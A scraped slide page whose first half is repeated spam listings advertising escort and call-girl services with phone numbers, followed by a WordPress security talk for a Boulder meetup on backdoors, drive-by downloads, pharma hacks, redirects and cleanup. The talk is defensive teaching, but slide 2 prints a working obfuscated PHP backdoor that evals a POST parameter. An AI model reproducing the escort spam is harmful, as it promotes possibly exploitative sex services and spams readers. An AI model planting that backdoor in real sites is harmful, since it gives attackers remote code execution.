Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
imonikaupta
 
Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.
soniya singh
 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
tanu pandey
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
kojalkojal131
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
soniya singh
 
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
SofiyaSharma5
 
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
soniya singh
 

Kürzlich hochgeladen (20)

Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
 
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night StandHot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
 
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
 
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
 
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
 
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
Russian Call Girls in %(+971524965298 )# Call Girls in DubaiRussian Call Girls in %(+971524965298 )# Call Girls in Dubai
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 
@9999965857 🫦 Sexy Desi Call Girls Laxmi Nagar 💓 High Profile Escorts Delhi 🫶
@9999965857 🫦 Sexy Desi Call Girls Laxmi Nagar 💓 High Profile Escorts Delhi 🫶@9999965857 🫦 Sexy Desi Call Girls Laxmi Nagar 💓 High Profile Escorts Delhi 🫶
@9999965857 🫦 Sexy Desi Call Girls Laxmi Nagar 💓 High Profile Escorts Delhi 🫶
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
 
Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.
 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
 
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
 
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
 

Security Presentation for Boulder WordPress Meetup

  • 1. YOUR SITE 
 IS AND IS NOT HACKED @ASKWPGIRL
  • 2. SCHRODINGER’S WEBSITE You must assume your site is both hacked and not hacked until you open the box and find out. <?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2]. $qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval($ {$s20}['q53b3a6']);}?>
  • 3. WordPress Instructor and Custom Theme Developer Using WordPress Since 2007 —Version 2.2 Not a security expert, but I play one on WordPress.tv Angela Bowman 
 Ask WP Girl @askwpgirl
  • 5. WHY DO HACKERS HACK? Deface sites for fun Add spammy links to bad web neighborhoods (SEO spam) Hijack site to add spam, porn, gambling, pay-day loans content Steal sensitive information to sell Distribute malware to personal computers Use server resources for 
 distributed attacks
  • 6. WHAT DO HACKERS ACTUALLY DO? Create new accounts with admin privileges Reset passwords of multiple accounts Inject malicious code into content Add malicious code to existing files or new files Redirect your website by editing .htaccess file http://www.wpmayor.com/wordpress-security-based-facts-statistics/
  • 7. WHY SHOULD YOU CARE? Your site can start running 
 really slow Your SEO could take a nose 
 dive Your site could be blacklisted or taken down by your web host Your site could be added to the Phish Tank which is hard to get out of You could be sued by 
 customers for damages Your site can become unusable
  • 8. TYPICALLY, ONLY THE MOST SEVERELY HACKED SITES WILL BE BLACKLISTED OR SUSPENDED BY HOST Many hacks are hidden
  • 9. WHY ARE WORDPRESS SITES VULNERABLE? PHP and MySQL inherently vulnerable - easy to write hackable code that works! Current WordPress version very secure Themes and plugins not all created equal Hosting security varies Login credentials can be compromised Personal computer may be infected
  • 10. HACK STATS 29% 8% 22% 41% 41% Hosting 22% Plugins 29% Themes 8% Weak Passwords
  • 11. RECENT VULNERABILITIES Google Analytics WordPress 4.2.1 Backup to Dropbox FancyBox TwentyFifteen Revolution SliderGravity Forms JetPack Database of all vulnerable plugins and themes: https://wpvulndb.com/
  • 12. RECENT STATS 100,000+ WordPress Sites 
 Compromised through Slider Revolution 
 SecurityVulnerability 800,000 banking credentials 
 stolen using hacked WordPress sites 600,000 WordPress Websites Compromised through Fancybox Plugin
 SecurityVulnerability http://www.databreachtoday.com/hackers-grab-800000-banking-credentials-a-7416 http://wptavern.com/hackers-hijack-fancybox-plugin-to-deface-wordpress-sites-with-isis-propaganda
  • 13. LOW HANGING FRUIT Vulnerabilities immediately published on the web Hackers write bots to exploit vulnerabilities Website owners are oblivious: they don’t update, use weak passwords, install tons of plugins, use not-great web hosting
  • 15. 1 - Backdoors PHP files uploaded to your server and accessed remotely. Severely affect site and server performance. Not easy to find.
  • 16. IT'S VERY COMMON, THAT BACKDOORS DON'T HAVE ANY VISIBLE SIGNS IN THE SITE CODE AND IT'S IMPOSSIBLE TO DETECT THEM BY ACCESSING THE INFECTED SITE FROM OUTSIDE. ~ SUCURI
  • 17. Removing Backdoors Check WordPress core integrity using Sucuri plugin https://wordpress.org/plugins/sucuri-scanner/ Delete and reinstall WordPress 
 core files, plugins, and themes Check wp-content and 
 uploads folder carefully 
 for hacked PHP files Run https://wordpress.org/plugins/gotmls/ 
 to check for hacked files
 in the wp-content folder Gravity Forms hack which of these files is 
 not like the others?
  • 18. DIY HACK RECOVERY Via SFTP (preferred) or FTP 1 Backup: Download everything. Good to examine later for details of hack if needed. 2 Delete 
 all except: cgi-bin .htaccess wp-config.php (examine these) 3 Upload fresh: WordPress Themes Plugins cleaned uploads
  • 19. Hmmmm? PHP in a CSS folder? Look for modified dates Look for unusual names Compare file list to original download Look for file types that don’t belong Check commonly hacked files: .htaccess, wp-config.php, index.php, functions.php, header.php Any file can be hacked!
  • 20. 2 - Drive by Downloads Script injected on website generates links to malware sites or downloads malware from your site to visitors’ computers. Easy for scanners to detect.
  • 21. Cleaning up Drive by Downloads Use Sucuri Sitecheck to scan site; read about hack Disable javascript before hitting your site – don’t want to end up infecting your own computer while checking your site. Remove hacked code from content or files. Commonly hacked core files: index.php and wp_blog_header.php Commonly hacked theme files: index.php, functions.php, header.php, footer.php Monitor site
  • 22. 3 - Pharma Hack Spam links injected onto web pages only visible to search engines. Difficult to scan for because cloaked.
  • 23. Cleaning up Pharma Hack Use http://www.botsvsbrowsers.com/ SimulateUserAgent.asp to scan site using different devices to find hack Search site with Google Same clean up as 
 Drive by Downloads Can be cross-infected
 from other sites on 
 server/hosting 
 account Read this: https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site- part-i-wordpress-and-the-pharma-hack.html site:yoursitename.com
  • 24. 4 - Malicious Redirects Redirects traffic from your website to another typically by modifying the .htaccess file, sometimes only when viewed by a particular device or browser, like a phone Hacked .htaccess file
  • 25. Finding and Removing Malicious Redirects Listen to when someone tells you that they tried to visit your site and couldn’t and find out which browser or device they were using at the time. Use http://www.botsvsbrowsers.com/ SimulateUserAgent.asp to verify Scan with Sucuri’s SiteCheck Check all the .htaccess files on the server and remove the redirect. https://sitecheck.sucuri.net/
  • 26. Why are people from Thailand and Romania accessing a strangely named PHP file somewhere? Check raw access logs via cPanel db12.php, css.php, dirs35.php???? MONITORING TIPS
  • 27. Use Google Search Console! Google Webmaster Tools/Search Console Search Queries – you can spot queries irrelevant to you site. Links toYour Site – you can find suspicious incoming links here. Internal Links – this report can help reveal rogue sections of your site. http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/
  • 28. Check for rogue users and posts Your new admin friends? Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
  • 29. Audit Activity on Site https://wordpress.org/plugins/wp-simple-firewall/
  • 30. IMMEDIATELY CHANGE PASSWORDS Use Sucuri plugin to Generate New Security Keys Reset all passwords, including WordPress 
 users, FTP, web hosting, control panel Scan computer for viruses!
  • 31. See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination CLEAN UP “BAD” HACK If hackers got admin access to site or database, you might have to nuke the entire site from orbit — it’s the only way to be sure https://www.youtube.com/watch?v=aCbfMkh940Q Or contact sucuri.net for 
 site clean up and monitoring
  • 32. REQUEST SITE REVIEW If Google blacklisted your site or marked it for phishing scam, you will need to request a review after you are certain you’ve cleaned up all hacked files:
 https://support.google.com/webmasters/answer/ 168328?hl=en
  • 34. UPDATE UPDATE UPDATE Timely updates are critical for security. 
 Tools: iControlWP, InfiniteWP, Jetpack, ManageWP, http://askwpgirl.com/updating-wordpress-plugins-themes-core/
  • 35. UPDATING PREMIUM THEMES AND PLUGINS Often a manual process - Download and FTP new files Bundled plugins are not supported or auto updated Enter license key/purchase code in settings to receive updates http://askwpgirl.com/updating-wordpress-plugins-themes-core/
  • 36. SECURE YOUR LOGIN Online Generator: 
 http://www.pctools.com/guides/password/ Track Passwords: 
 http://agilebits.com/products/1Password Enable Two-Factor Authentication: http://askwpgirl.com/wordpress-two-factor- authentication-plugins/
  • 37. RUN A TIGHT SHIP! Delete ALL unused stuff on server Only use popular and well-maintained themes and plugins Don’t allow users to register (Settings > General) Always hold comments for moderation and use spam filtering (Akismet plugin)
  • 38. GOOD HOSTING Correct File Permissions WordPress Auto Updates Firewall and Scanning Regular Backups Server Security Performance Optimization Managed WordPress Hosts: Site Ground WP Engine Get Flywheel Web Synthesis Pantheon
  • 39. EFFECTIVE SECURITY PLUGIN FEATURES Limit login access Block bad URL requests 
 with a Firewall Audit activity
 Security through obscurity is not security IP addresses don’t matter and should not be used as the foundation of aWordPress security policy My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/ Does all the above and more.Will notify you of vulnerable plugins.
  • 40. BACKUPS Common wisdom is to backup your site Backups are to your site what major medical health care coverage is to your health Usually only helpful in case of a disaster Services: VaultPress and WorpDrive good hosted solutions! Plugins: BackupBuddy (paid), BackWPUp, Duplicator
  • 41. SECURE YOUR COMPUTER Scan for viruses and trojans Be careful about downloading stuff!!!!
  • 42. RESOURCES http://snipe.net/2010/01/when-wordpress-gets-hacked/ https://support.google.com/webmasters/answer/163633?rd=1 *** http://aw-snap.info/articles/find-backdoor.php http://codex.wordpress.org/FAQ_My_site_was_hacked http://sucuri.net - free scan, hack recovering, site monitoring, 
 great posts on how to clean up specific hacks http://aswkpgirl.com/nuke-it-from-orbit https://www.icontrolwp.com/2014/05/wordpress-security-simple-firewall-plugin-part-4- login-protection-feature/ https://www.icontrolwp.com/2014/06/beware-new-security-theat-wordpress- misinformation-virus/ About the banking hack: https://www.proofpoint.com/es/node/327 Top 10 Web application security risks for developers: https://youtu.be/nuWR_HiBHYc http://www.smashingmagazine.com/2012/10/four-malware-infections-wordpress/
  • 43. CONTACT facebook.com/askwpgirl 
 twitter.com/askwpgirl 
 http://askwpgirl.com http://boulderdigitalarts.com One-on-One consulting third Friday of every month at Boulder Digital Arts Six-week theme customization course in Colorado and online. SEO and Best Maintenance Tips Newsletter http://askwpgirl.com